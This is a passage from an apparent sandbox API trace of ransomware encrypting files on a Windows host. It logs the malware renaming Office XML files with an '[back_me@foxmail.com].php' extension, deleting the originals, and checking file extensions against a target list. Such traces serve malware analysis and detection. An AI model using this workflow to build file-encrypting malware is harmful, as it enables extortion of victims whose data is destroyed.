(in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.164] GetLastError () returned 0x0 [0042.164] ReadFile (in: hFile=0x208, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x5b2, lpOverlapped=0x0) returned 1 [0042.176] WriteFile (in: hFile=0x20c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0042.177] ReadFile (in: hFile=0x208, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.177] WriteFile (in: hFile=0x20c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.177] SetEndOfFile (hFile=0x20c) returned 1 [0042.177] CloseHandle (hObject=0x20c) returned 1 [0042.178] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.178] SetEndOfFile (hFile=0x208) returned 1 [0042.179] CloseHandle (hObject=0x208) returned 1 [0042.179] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.179] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 1 [0042.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.179] lstrlenW (lpString=".doc") returned 4 [0042.179] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.179] lstrlenW (lpString=".docx") returned 5 [0042.179] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0042.179] lstrlenW (lpString=".pdf") returned 4 [0042.179] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.179] lstrlenW (lpString=".xls") returned 4 [0042.179] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.179] lstrlenW (lpString=".xlsx") returned 5 [0042.180] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0042.180] lstrlenW (lpString=".ppt") returned 4 [0042.180] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.180] lstrlenW (lpString=".zip") returned 4 [0042.180] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.180] lstrlenW (lpString=".rar") returned 4 [0042.180] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.180] lstrlenW (lpString=".bz2") returned 4 [0042.180] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.180] lstrlenW (lpString=".7z") returned 3 [0042.180] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.180] lstrlenW (lpString=".dbf") returned 4 [0042.180] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.180] lstrlenW (lpString=".1cd") returned 4 [0042.180] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.180] lstrlenW (lpString=".jpg") returned 4 [0042.180] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.180] lstrlenW (lpString=".doc") returned 4 [0042.180] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.180] lstrlenW (lpString=".docx") returned 5 [0042.180] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0042.180] lstrlenW (lpString=".pdf") returned 4 [0042.180] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.180] lstrlenW (lpString=".xls") returned 4 [0042.180] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.180] lstrlenW (lpString=".xlsx") returned 5 [0042.181] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0042.181] lstrlenW (lpString=".ppt") returned 4 [0042.181] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.181] lstrlenW (lpString=".zip") returned 4 [0042.181] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.181] lstrlenW (lpString=".rar") returned 4 [0042.181] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.181] lstrlenW (lpString=".bz2") returned 4 [0042.181] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.181] lstrlenW (lpString=".7z") returned 3 [0042.181] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.181] lstrlenW (lpString=".dbf") returned 4 [0042.181] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.181] lstrlenW (lpString=".1cd") returned 4 [0042.181] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0042.181] lstrlenW (lpString=".jpg") returned 4 [0042.181] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.181] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.181] lstrlenW (lpString="SETUP.XML") returned 9 [0042.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0042.204] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=5884) returned 1 [0042.204] CloseHandle (hObject=0x218) returned 1 [0042.204] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 0x20 [0042.204] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.204] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0042.205] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.205] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0042.257] GetLastError () returned 0x0 [0042.257] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x16fc, lpOverlapped=0x0) returned 1 [0042.260] WriteFile (in: hFile=0x21c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x1700, lpOverlapped=0x0) returned 1 [0042.261] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.261] WriteFile (in: hFile=0x21c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.261] SetEndOfFile (hFile=0x21c) returned 1 [0042.261] CloseHandle (hObject=0x21c) returned 1 [0042.262] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.262] SetEndOfFile (hFile=0x218) returned 1 [0042.263] CloseHandle (hObject=0x218) returned 1 [0042.263] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.263] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 1 [0042.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.264] lstrlenW (lpString=".doc") returned 4 [0042.264] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.264] lstrlenW (lpString=".docx") returned 5 [0042.264] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.264] lstrlenW (lpString=".pdf") returned 4 [0042.264] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.264] lstrlenW (lpString=".xls") returned 4 [0042.264] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.264] lstrlenW (lpString=".xlsx") returned 5 [0042.264] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.264] lstrlenW (lpString=".ppt") returned 4 [0042.264] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.264] lstrlenW (lpString=".zip") returned 4 [0042.264] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.264] lstrlenW (lpString=".rar") returned 4 [0042.264] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.264] lstrlenW (lpString=".bz2") returned 4 [0042.264] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.264] lstrlenW (lpString=".7z") returned 3 [0042.264] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.264] lstrlenW (lpString=".dbf") returned 4 [0042.264] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.264] lstrlenW (lpString=".1cd") returned 4 [0042.264] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.264] lstrlenW (lpString=".jpg") returned 4 [0042.264] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.265] lstrlenW (lpString=".doc") returned 4 [0042.265] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.265] lstrlenW (lpString=".docx") returned 5 [0042.265] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.265] lstrlenW (lpString=".pdf") returned 4 [0042.265] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.265] lstrlenW (lpString=".xls") returned 4 [0042.265] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.265] lstrlenW (lpString=".xlsx") returned 5 [0042.265] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.265] lstrlenW (lpString=".ppt") returned 4 [0042.265] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.265] lstrlenW (lpString=".zip") returned 4 [0042.265] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.265] lstrlenW (lpString=".rar") returned 4 [0042.265] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.265] lstrlenW (lpString=".bz2") returned 4 [0042.265] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.265] lstrlenW (lpString=".7z") returned 3 [0042.265] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.265] lstrlenW (lpString=".dbf") returned 4 [0042.265] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.265] lstrlenW (lpString=".1cd") returned 4 [0042.265] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0042.265] lstrlenW (lpString=".jpg") returned 4 [0042.266] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.266] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.266] lstrlenW (lpString="SETUP.XML") returned 9 [0042.266] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0042.976] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=6241) returned 1 [0042.976] CloseHandle (hObject=0x204) returned 1 [0042.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 0x20 [0042.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0042.977] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.977] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0042.977] GetLastError () returned 0x0 [0042.977] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x1861, lpOverlapped=0x0) returned 1 [0042.983] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x1870, lpOverlapped=0x0) returned 1 [0042.984] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.984] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.984] SetEndOfFile (hFile=0x210) returned 1 [0042.985] CloseHandle (hObject=0x210) returned 1 [0042.985] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.986] SetEndOfFile (hFile=0x204) returned 1 [0042.986] CloseHandle (hObject=0x204) returned 1 [0042.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.987] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 1 [0042.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.987] lstrlenW (lpString=".doc") returned 4 [0042.987] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.987] lstrlenW (lpString=".docx") returned 5 [0042.987] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.987] lstrlenW (lpString=".pdf") returned 4 [0042.987] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.987] lstrlenW (lpString=".xls") returned 4 [0042.987] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.987] lstrlenW (lpString=".xlsx") returned 5 [0042.987] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.987] lstrlenW (lpString=".ppt") returned 4 [0042.987] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.987] lstrlenW (lpString=".zip") returned 4 [0042.987] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.987] lstrlenW (lpString=".rar") returned 4 [0042.987] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.987] lstrlenW (lpString=".bz2") returned 4 [0042.987] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.987] lstrlenW (lpString=".7z") returned 3 [0042.987] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.987] lstrlenW (lpString=".dbf") returned 4 [0042.987] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.988] lstrlenW (lpString=".1cd") returned 4 [0042.988] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.988] lstrlenW (lpString=".jpg") returned 4 [0042.988] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.988] lstrlenW (lpString=".doc") returned 4 [0042.988] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.988] lstrlenW (lpString=".docx") returned 5 [0042.988] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.988] lstrlenW (lpString=".pdf") returned 4 [0042.988] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.988] lstrlenW (lpString=".xls") returned 4 [0042.988] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.988] lstrlenW (lpString=".xlsx") returned 5 [0042.988] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.988] lstrlenW (lpString=".ppt") returned 4 [0042.988] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.988] lstrlenW (lpString=".zip") returned 4 [0042.988] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.988] lstrlenW (lpString=".rar") returned 4 [0042.988] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.988] lstrlenW (lpString=".bz2") returned 4 [0042.988] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.988] lstrlenW (lpString=".7z") returned 3 [0042.988] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.988] lstrlenW (lpString=".dbf") returned 4 [0042.988] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.988] lstrlenW (lpString=".1cd") returned 4 [0042.989] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0042.989] lstrlenW (lpString=".jpg") returned 4 [0042.989] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.989] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.989] lstrlenW (lpString="DATES.XML") returned 9 [0042.989] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0042.989] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=8918) returned 1 [0042.989] CloseHandle (hObject=0x204) returned 1 [0042.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 0x20 [0042.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart 